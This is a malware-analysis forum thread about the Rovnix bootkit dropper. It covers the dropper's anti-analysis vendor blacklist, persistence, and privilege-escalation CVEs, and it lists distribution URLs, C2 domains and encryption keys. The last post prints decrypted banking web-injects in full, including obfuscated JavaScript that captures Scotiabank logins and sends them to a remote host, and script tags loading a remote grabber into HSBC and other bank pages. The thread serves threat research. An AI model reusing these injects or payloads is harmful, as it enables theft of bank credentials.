A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #24924  by EP_X0FF
 Tue Jan 13, 2015 9:14 am
Dump it and compare. They will be different for XP and Vista simple because boot loader has different name etc.
 #24994  by r3shl4k1sh
 Mon Jan 19, 2015 8:10 am
Tigzy wrote: I just want to know if from a machine A to a machine B there's nothing in the assembly code that is strongly related to the machine.
From what i know the contents of the VBR is different for different file systems it is installed on.
In a regular windows setup it will create a small (usually 100MB) partition to host the boot files on it, this partition could be any format that windows supports (FAT, NTFS etc) so the VBR contents that is responsible to interact with this partition and load the appropriate files from it must be different.

Honestly i have never checked if the code of the VBR is different between FAT-32 and NTFS partitions but do your checks.

As a side note you should be aware to the fact that there are machines with Recovery partitions (like some of the DELL and Acer laptops) that you have to be sure that their VBR is standard.

EDIT:
I quote from Windows Internals book (part-2 page 502) (boot sector == VBR):
Before writing to a partition’s boot sector, Windows Setup ensures that the boot partition (the boot
partition is the partition on which Windows is installed, which is typically not the same as the system
partition, where the boot files are located) is formatted with NTFS, the only supported file system that
Windows can boot from when installed on a fixed disk, or formats the boot partition (and any other
partition) with NTFS. Note that the format of the system partition can be any format that Windows
supports (such as FAT32). If partitions are already formatted appropriately, you can instruct Setup
to skip this step. After Setup formats the system partition, Setup copies the Boot Manager program
(Bootmgr) that Windows uses to the system partition (the system volume).

Setup must know the partition format before it writes a boot sector because the contents of the boot
sector vary depending on the format. For a partition that is in NTFS format, Windows writes NTFS capable
code. The role of the boot-sector code is to give Windows information about the structure
and format of a volume and to read in the Bootmgr file from the root directory of the volume. Thus,
the boot-sector code contains just enough read-only file system code to accomplish this task.
 #25873  by r3shl4k1sh
 Fri May 15, 2015 12:35 pm
Hi folks,

A fresh Rovnix dropper (MS: TrojanDropper:Win32/Rovnix.P, ESET: Win32/Rovnix.Z) that contains CVE-2013-3660 and CVE-2014-4113 in order to escalate its privileges.
d1049482df1d0d0cfe84f00eb710ab14009afb7a1d496ee664b7e24f312805ae

The driver contains an effective method to prevent loading of analysis tools by reading the RT_VERSION section of every loaded image (PsSetLoadImageNotifyRoutine) and comparing the strings it found to the following list:
Code: Select all
agnitum alwilsoftware pctools grisoft aviragmbh aviraproduct avirafreeantivirus bitdefender avginternetsecurity comodo doctorweb eset,spol esetsmart frisksoftware kaspersky pandasoftware symanteccorporation checkpointsoftware microsoftsecurity microsoftmalware mcafee bullguard novashieldinc cjscreturnilsoftware sophosplc quickhealtechnologies gdatasoftware beijingrising immunetcorporation k7computing sunbeltsoftware beijingjiangmin usbdisksecurity deepfreeze virus malware rootkit rapport
Image

If it finds one match it terminates the process.
The driver hooks IRP_MJ_INTERNAL_DEVICE_CONTROL:
Image
Image

If the dropper is able to install the Bootkit successfully the payload dll will be loaded by the driver (found the FJ section) else the payload dll will be dropped onto the system and registered at the registry as:
Code: Select all
HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
rundll32.exe <payload.dll>, DllInitialize
If certain type of protection tools installed on the system the dropper is going to download a fresh payload (instead of dropping the embedded payload) which has much less detection rate:
Image

Image


It stores the various files it drops to the system in an aPlib compressed form using a bit different header:
Image

I wrote a post about the analysis of this dropper and the installation process:
http://www.malwaredigger.com/2015/05/ro ... lysis.html

In attach:
  • Packed and unpacked sample (VT39/56)
  • Extracted drivers (32b VT 18/57, 64b VT 7/56
  • Extracted FJ sections (payload 32b, VT 14/57)
  • Extracted payload (32b VT 23/56, 64b VT 10/55)
  • Downloaded payload (packed VT 2/57, unpacked VT 14/56)
  • Infected VBR (VT 14/57)
Attachments
pass: infected
(975.82 KiB) Downloaded 112 times
 #25875  by R136a1
 Fri May 15, 2015 1:52 pm
To spread the dropper compromised 3rd party websites are used.

List:
Code: Select all
http://adronhomesproperties.com/CAUzjMl
http://adronhomesproperties.com/CAUzjMl/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://adronhomesproperties.com/sAo4YeZ
http://adronhomesproperties.com/sAo4YeZ/Your_EE_Group_bill_April2015_039425593_3_pdf.zip
http://belenza.cl/CJMjR6g
http://belenza.cl/CJMjR6g/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://elalamochile.cl/DhXjt5I04
http://elalamochile.cl/DhXjt5I04/Your_EE_Group_bill_April2015_039425593_3_pdf.zip
http://elalamochile.cl/xnFZgiV
http://elalamochile.cl/xnFZgiV/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://fiskalnekielce.pl/S7dte8
http://fiskalnekielce.pl/S7dte8/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://magem.cl/iwCZE
http://magem.cl/iwCZE/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://magem.cl/MgQmj
http://magem.cl/MgQmj/Your_EE_Group_bill_April2015_039425593_3_pdf.zip
http://mariagraziacampus.it/ZMEsu9TCyc
http://mariagraziacampus.it/ZMEsu9TCyc/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://ortopediaespecializada.cl/dOojm
http://ortopediaespecializada.cl/dOojm/Your_EE_Group_bill_April2015_039425593_3_pdf.zip
http://ortopediaespecializada.cl/YwOQq
http://ortopediaespecializada.cl/YwOQq/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://pondprasong.ac.th/57GfUmIrep
http://pondprasong.ac.th/57GfUmIrep/Your_EE_Group_bill_April2015_039425593_3_pdf.zip
http://pondprasong.ac.th/o1mCQOxBL
http://pondprasong.ac.th/o1mCQOxBL/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://radiowtf.com.au/kR0gMUYv
http://radiowtf.com.au/kR0gMUYv/Your_EE_Group_bill_April2015_039425593_3_pdf.zip
http://radiowtf.com.au/LJrxtZiOf
http://radiowtf.com.au/LJrxtZiOf/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://somedia.so/7Jo3tVYQ
http://somedia.so/7Jo3tVYQ/Your_EE_Group_bill_April2015_039425593_3_pdf.zip
http://somedia.so/tO2BHKw
http://somedia.so/tO2BHKw/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://tapmi-brandscan.com/2kwiFyaQpY
http://tapmi-brandscan.com/2kwiFyaQpY/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://tribalevangelisttimothy.org/8CZnFRA
http://tribalevangelisttimothy.org/8CZnFRA/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://vas-consult.com/pdByR
http://vas-consult.com/pdByR/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://vas-consult.com/x6XZhu2jsT
http://vas-consult.com/x6XZhu2jsT/Your_EE_Group_bill_April2015_039425593_3_pdf.zip
http://vietkim.net/tmp/F8yMs
http://vietkim.net/tmp/F8yMs/Your_EE_Group_bill_April2015_039425593_3_pdf.zip
http://vietkim.net/tmp/fgi8dmV
http://vietkim.net/tmp/fgi8dmV/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://wfsupplies.co.nz/images/VM6RBqaOpJ
http://wfsupplies.co.nz/images/VM6RBqaOpJ/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://www.acilnet.com/Xg2FbVQ8n4
http://www.acilnet.com/Xg2FbVQ8n4/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://www.eibe-online.de/p8uqzkEweY
http://www.eibe-online.de/p8uqzkEweY/Your_VirginMedia_bill_April2015_2983488_UR84.zip
http://www.samxiongphoto.com/pKSAXQD
http://www.samxiongphoto.com/pKSAXQD/Your_VirginMedia_bill_April2015_2983488_UR84.zip
Does anyone know the initial infection vector? Files are named to look like email attachments.
 #26045  by comak
 Tue Jun 09, 2015 10:25 pm
This shit uses a lot of code...

from upacked rovnix dropper (8272f1d0de9011d1d02f49d7e68b1de1)

i extracted bunch of binaries
Code: Select all
bum.exe.1a8b8db96eac11f649c465f2b69ecc6a.bin: data
bum.exe.2be56b2ed5ba37c6df22cf2aa13fd352.bin: PE32 executable (native) Intel 80386, for MS Windows
bum.exe.2d253d6143d8a2e1e2e45cb850bc3ab0.bin: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
bum.exe.38ae84ee21a07e9bfa2172788133d177.bin: DOS executable (COM)
bum.exe.4f7d6948fb35e46c069762e8713dac86.bin: PE32+ executable (GUI) x86-64, for MS Windows
bum.exe.58ae86ff564075f34c3e9291b6c352c0.bin: data
bum.exe.61ad7164d9be76f24278bd9a858e7cb0.bin: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
bum.exe.98e70439a6922e06e24636779456b2b8.bin: PE32+ executable (native) x86-64, for MS Windows
bum.exe.a0b73982f48399e2b9fc99d54a2dc493.bin: PE32 executable (console) Intel 80386, for MS Windows
bum.exe.ac95ea72a833d54be29791008f3ced14.bin: PE32+ executable (native) x86-64, for MS Windows
bum.exe.ad8b2123a0e8a7b38c3245baf939cc43.bin: PE32 executable (native) Intel 80386, for MS Windows
bum.exe.c9f371cae74ed398cbe81bbf71ec0747.bin: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
where:
/tmp/bum.exe.61ad7164d9be76f24278bd9a858e7cb0.bin <- WoW64Ext library from https://github.com/rwfpl/rewolf-wow64ext

Sysinternals Myfault
bum.exe.2be56b2ed5ba37c6df22cf2aa13fd352.bin
bum.exe.ac95ea72a833d54be29791008f3ced14.bin

Sysinternals Contig
bum.exe.a0b73982f48399e2b9fc99d54a2dc493.bin

Shellcode?
bum.exe.1a8b8db96eac11f649c465f2b69ecc6a.bin
bum.exe.58ae86ff564075f34c3e9291b6c352c0.bin

Additional dll / payload
bum.exe.c9f371cae74ed398cbe81bbf71ec0747.bin
bum.exe.2d253d6143d8a2e1e2e45cb850bc3ab0.bin

Bootkit dropper?
bum.exe.ad8b2123a0e8a7b38c3245baf939cc43.bin
bum.exe.98e70439a6922e06e24636779456b2b8.bin

Uknown
bum.exe.4f7d6948fb35e46c069762e8713dac86.bin

from payload it connects to cnc for more modules - all compressed with aplib
Code: Select all
mediavvads3.uk
mediavvads4.uk
mediavvads5.uk
hbs63zj7mwj5g6w7.onion

paths:  
 /login.asp
 /images/{transparent.gif,pixel.gif}
 /download/${mod}.zip 
   - where mod is one of: AAFEA2B5, B06139B1, EB4E2654,27747DC2 -- list obtained from cnc

rc2:
key: BN21Rc0LqZA9   iv: v03dSH36m
key: B4yQz67GbO1P  iv: v2Ds34BQ9



Code: Select all
rovnix.AAFEA2B5.dll ->
  bootkitdll.c78ebe1395615d39350e5155fc8486e8.bin ->
     bootkitdll.1bf7b8392cdc996954bc1e28c9bead19.bin -- plvnc (exe?)
     
rovnix.B06139B1.dl ->
  bootkitdll.4acc23e1a445cca0a1e30f3171f90dac.bin ->
     bootkitdll.6206d4ef511899fe52d152713c27d392.bin -> 
       bootkitdll.4e113e510d913ae98561d2f31b60e108.bin -- (p6 - spyeye - softwaregrabber.dll)
       
rovnix.EB4E2654.dll ->
  bootkitdll.2e2d3ef681f085672655c805412907c7.bin ->
     bootkitdll.2023c04dec511027da26a4620e9bcae9.bin ->  (PLTOR)
       bootkitdll.fecf803f7d84d4cfa81277298574d6e6.bin  -- unzip
       bootkitdll.95622e8f469d586061b32b5312899624.bin  -- (zip - tor bundle)

rovnix.27747DC2.dll ->
  bootkitdll.cfc57b26908febaaab8398ffeec59579.bin ->  -- cnc comm -- ReactorDemo.dll
     bootkitdll.1f895c237b131c1739985e2851dc5236.bin -- injects -- ReactorDll.dll

shit load of code (15MB) - > http://lokalhost.pl/dump/reactor.zip
Attachments
pw: infected
(649.78 KiB) Downloaded 84 times
 #26189  by r3shl4k1sh
 Fri Jun 26, 2015 8:44 am
Hi,

It seems like Symantec detects the latest Rovnix Dropper and payload as Carberb.C:
http://www.symantec.com/connect/blogs/n ... down-under

Part of the decrypted web-injects from the sample posted by @comak (You can get the full web-injects in the attached zip file):
Code: Select all
set_url *.scotiaonline.scotiabank.com/online/authentication/authentication.bns GP

data_before
<body>
data_end

data_inject
<script type="text/javascript">
jQuery('body').hide();


var _0x7f7f=["\x53\x43\x52\x49\x50\x54","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x3F\x72\x61\x6E\x64\x3D","\x72\x61\x6E\x64\x6F\x6D","\x26","\x61\x6A\x61\x78\x5F\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x6F\x6E\x6C\x6F\x61\x64","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65","\x73\x63\x72\x69\x70\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x6C\x6F\x61\x64\x65\x64","\x63\x6F\x6D\x70\x6C\x65\x74\x65","\x61\x70\x70\x6C\x79","\x72\x65\x6D\x6F\x76\x65\x43\x68\x69\x6C\x64","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50","\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66","\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76","\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F","\x3D","","\x72\x65\x70\x6C\x61\x63\x65","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];function sendScriptRequest(_0xade3x2,_0xade3x3,_0xade3x4,_0xade3x5){var _0xade3x6=document[_0x7f7f[1]](_0x7f7f[0]);if(_0xade3x3){_0xade3x3=_0x7f7f[2]+Math[_0x7f7f[3]]()+_0x7f7f[4]+_0xade3x3;} else {_0xade3x3=_0x7f7f[2]+Math[_0x7f7f[3]]();} ;_0xade3x6[_0x7f7f[5]]=false;_0xade3x6[_0x7f7f[6]]=scriptCallback(_0xade3x6,_0xade3x4,_0xade3x5);_0xade3x6[_0x7f7f[7]]=scriptCallback(_0xade3x6,_0xade3x4,_0xade3x5);_0xade3x6[_0x7f7f[8]]=_0xade3x2+_0xade3x3;document[_0x7f7f[12]](_0x7f7f[11])[0][_0x7f7f[10]][_0x7f7f[9]](_0xade3x6);} ;function scriptCallback(_0xade3x6,_0xade3x4,_0xade3x5){return function (){if(_0xade3x6[_0x7f7f[5]]){return ;} ;if(!_0xade3x6[_0x7f7f[13]]||_0xade3x6[_0x7f7f[13]]==_0x7f7f[14]||_0xade3x6[_0x7f7f[13]]==_0x7f7f[15]){_0xade3x6[_0x7f7f[5]]=true;_0xade3x4[_0x7f7f[16]](_0xade3x6,_0xade3x5);_0xade3x6[_0x7f7f[10]][_0x7f7f[17]](_0xade3x6);} ;} ;} ;function decode64(_0xade3x9){var _0xade3xa=_0x7f7f[18]+_0x7f7f[19]+_0x7f7f[20]+_0x7f7f[21]+_0x7f7f[22];var _0xade3xb=_0x7f7f[23];var _0xade3xc,_0xade3xd,_0xade3xe=_0x7f7f[23];var _0xade3xf,_0xade3x10,_0xade3x11,_0xade3x12=_0x7f7f[23];var _0xade3x13=0;var _0xade3x14=/[^A-Za-z0-9\+\/\=]/g;_0xade3x9=_0xade3x9[_0x7f7f[24]](/[^A-Za-z0-9\+\/\=]/g,_0x7f7f[23]);do{_0xade3xf=_0xade3xa[_0x7f7f[26]](_0xade3x9[_0x7f7f[25]](_0xade3x13++));_0xade3x10=_0xade3xa[_0x7f7f[26]](_0xade3x9[_0x7f7f[25]](_0xade3x13++));_0xade3x11=_0xade3xa[_0x7f7f[26]](_0xade3x9[_0x7f7f[25]](_0xade3x13++));_0xade3x12=_0xade3xa[_0x7f7f[26]](_0xade3x9[_0x7f7f[25]](_0xade3x13++));_0xade3xc=(_0xade3xf<<2)|(_0xade3x10>>4);_0xade3xd=((_0xade3x10&15)<<4)|(_0xade3x11>>2);_0xade3xe=((_0xade3x11&3)<<6)|_0xade3x12;_0xade3xb=_0xade3xb+String[_0x7f7f[27]](_0xade3xc);if(_0xade3x11!=64){_0xade3xb=_0xade3xb+String[_0x7f7f[27]](_0xade3xd);} ;if(_0xade3x12!=64){_0xade3xb=_0xade3xb+String[_0x7f7f[27]](_0xade3xe);} ;_0xade3xc=_0xade3xd=_0xade3xe=_0x7f7f[23];_0xade3xf=_0xade3x10=_0xade3x11=_0xade3x12=_0x7f7f[23];} while(_0xade3x13<_0xade3x9[_0x7f7f[28]]);;return unescape(_0xade3xb);} ;
      var bot_id = "%BOTID%" + "_ca_scotia";
	  var sa = decode64("aHR0cHM6Ly9zZWN1c3lzdG1lcy5wdy9zL2cucGhw");
	function blockonEnter()
    {
      jQuery("*").keydown(function(event)
   	  {
        if(13==event.keyCode){
		    event.preventDefault();
		    return false;
		}
     });
     jQuery("*").keyup(function(event) {
         if(13==event.keyCode){
		 	event.preventDefault();
		    return false;
		 }
     });
     jQuery("*").keypress(function(event) {
         if(13==event.keyCode){
		     event.preventDefault();
		    return false;
		 }
     });     
   }
   
 		function iLogin()
		{
               var u_login =  jQuery("input.signon-username").val();
               var u_pass  =  jQuery("input[type=password]").val();
                 if ( ( u_login.length  < 3 )  ||  ( u_pass.length  < 3 ) )
                {
                       alert('Error Message :\nPlease enter both your User ID and Password.');
                        return false;
               }   
          function myCallback()
          {
          jQuery('input[type=submit]').click();     
           }
           var req=  "send=1&bn=ca_scot&u_bot_id="  +    bot_id +"&u_login=" +u_login +"&u_pass=" + u_pass + "&log=ca_scot_login";
          sendScriptRequest(sa,req,myCallback, ["test123"]);
		   return false;
		}
		
	    jQuery(document).ready( function () {
		  	 blockonEnter();
		jQuery('input[type=submit]').hide();
		jQuery('input[type=submit]').before('<input id="signon_form:enter_sol" name="signon_form:enter_sol" onclick="iLogin();" value="Sign In" class="primary-button" type="button">');
		jQuery('body').show();
		});
</script>
data_end

data_after
data_end


set_url http*://*key.com* GP

data_before
sWinHTML += document.getElementById('wrapper').innerHTML;
data_end
data_inject
data_end
data_after
winprint.document.write(sWinHTML);
data_end

set_url http*://*key.com* GP

data_before
<link href="/ib2/css/print.css" rel="stylesheet"><body>
data_end
data_inject
data_end
data_after
';
data_end

set_url http*://*key.com* GP

data_before
<HEAD
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*key.com* GP

data_before
<head
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*key.com* GP

data_before
<Head
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*key.com* GP

data_before
<*finj*>
data_end
data_inject
<script>document.write('<sc'+'ript src="https://oscarday.com/figrab/figrabber.js?r='+Number(new Date())+'"></scr'+'ipt>');</script>
data_end
data_after
data_end


set_url http*://*.juniper.com* GP

data_before
<HEAD
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*.juniper.com* GP

data_before
<head
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*.juniper.com* GP

data_before
<Head
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*.juniper.com* GP

data_before
<*finj*>
data_end
data_inject
<script>document.write('<sc'+'ript src="https://oscarday.com/figrab/figrabber.js?r='+Number(new Date())+'"></scr'+'ipt>');</script>
data_end
data_after
data_end


set_url http*://*barclaycardus.com* GP

data_before
<html*>*<head*>*yui-common-a.js"></script>
data_end
data_inject
<script>document.write('<sc'+'ript src="https://oscarday.com/figrab/figrabber.js?r='+Number(new Date())+'"></scr'+'ipt>');</script>
data_end
data_after
data_end


set_url http*://*us.hsbc.com* GP

data_before
<HEAD
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*us.hsbc.com* GP

data_before
<head
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*us.hsbc.com* GP

data_before
<Head
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*us.hsbc.com* GP

data_before
<*finj*>
data_end
data_inject
<script>document.write('<sc'+'ript src="https://oscarday.com/figrab/figrabber.js?r='+Number(new Date())+'"></scr'+'ipt>');</script>
data_end
data_after
data_end


set_url http*://*hsbccreditcard.com* GP

data_before
<HEAD
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*hsbccreditcard.com* GP

data_before
<head
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*hsbccreditcard.com* GP

data_before
<Head
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*hsbccreditcard.com* GP

data_before
<*finj*>
data_end
data_inject
<script>document.write('<sc'+'ript src="https://oscarday.com/figrab/figrabber.js?r='+Number(new Date())+'"></scr'+'ipt>');</script>
data_end
data_after
data_end


set_url http*://*accountcentralonline.com/cmuser/login* GP

data_before
<HEAD
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*accountcentralonline.com/cmuser/login* GP

data_before
<head
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*accountcentralonline.com/cmuser/login* GP

data_before
<Head
data_end
data_inject
 finj
data_end
data_after
data_end

set_url http*://*accountcentralonline.com/cmuser/login* GP

data_before
<*finj*>
data_end
data_inject
<script>document.write('<sc'+'ript src="https://oscarday.com/figrab/figrabber.js?r='+Number(new Date())+'"></scr'+'ipt>');</script>
data_end
data_after
data_end
I wrote an analysis post about the payload and the banking trojan plugin:
http://www.malwaredigger.com/2015/06/ro ... lysis.html

Attached here are the payload and the decrypted plugins.
Attachments
pass: injected
(3.91 MiB) Downloaded 88 times
  • 1
  • 5
  • 6
  • 7
  • 8
  • 9